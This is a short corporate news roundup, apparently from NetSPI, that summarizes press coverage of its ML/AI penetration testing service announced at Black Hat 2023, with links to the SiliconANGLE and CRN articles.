NetSPI argues that with the current pace of machine learning and AI adoption, it’s vital for organizations to understand the distinct threats inherent in this technology, such as pinpointing weak spots and architecting more secure models. The new service is rooted in NetSPI’s adversarial machine learning testing methodology — the study of adversarial attacks on machine learning and corresponding defenses. 

Visit SiliconANGLE here to read the article.


CRN: 10 Cool New Security Products Unveiled At Black Hat 2023

On August 9, 2023, CRN summarized 10 products launched at this year’s Black Hat conference, including NetSPI’s AI/ML Penetration Testing. Scroll to slide 10 in the online article here for the full story. 


NetSPI ML/AI Pentesting

NetSPI, whose offerings include penetration testing services and attack surface management, said at Black Hat 2023 that it’s expanding to provide security for machine learning technologies—such as the Large Language Models used in generative AI apps. Calling the ML/AI Pentesting a “first-of-its-kind” offering, NetSPI said that key capabilities include identification, analysis and remediation for ML models such as LLMs. The company is also now providing “real-world” guidance on issues related to the securing of ML models, NetSPI said in a news release. 

Read the full article online.

Discover why security operations teams choose NetSPI.